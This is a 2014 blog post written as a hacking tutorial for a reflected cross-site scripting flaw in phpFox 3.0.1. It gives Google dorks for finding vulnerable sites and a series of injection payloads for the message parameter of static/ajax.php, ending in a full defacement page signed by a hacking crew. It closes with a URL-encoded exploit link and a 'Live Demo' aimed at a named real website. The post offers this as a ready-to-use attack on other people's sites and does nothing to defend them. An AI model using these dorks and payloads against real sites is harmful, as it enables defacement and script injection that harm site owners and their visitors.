Monday, 10 March 2014

phpFox XSS Vulnerability








Finding Vulnerable Target

Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."
            "inurl:/static/ajax.php?core"


1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- So, your site would be like this or something similar,

www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc  


2- Now, change the error message with your HTML tags or anything you want.

To show Header
<h1>Hacked</h1>

To show header in center

<center><h1>Hacked</h1></center>

To show Title

<title>Hacked</title>

To Add a Image
<img src="http://www.black-cybersec-crew.blogspot.com'><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/>

To add a Message
<p><b>Your Message Here<b></p>

To write message in next lines
<p><b>First line<br>Second Line <b></p>

To add a scrolling Text
<marquee>Scrolling text Here</marquee>

To Add a alert box

<script>alert("hello");</script>

To add background colour in page

<body bgcolor="red"/>

To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>XSSed!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.black-cybersec-crew.blogspot.com'><marquee><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/></marquee>


3- So it would be like this,

http://www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E


Live Demo:

http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E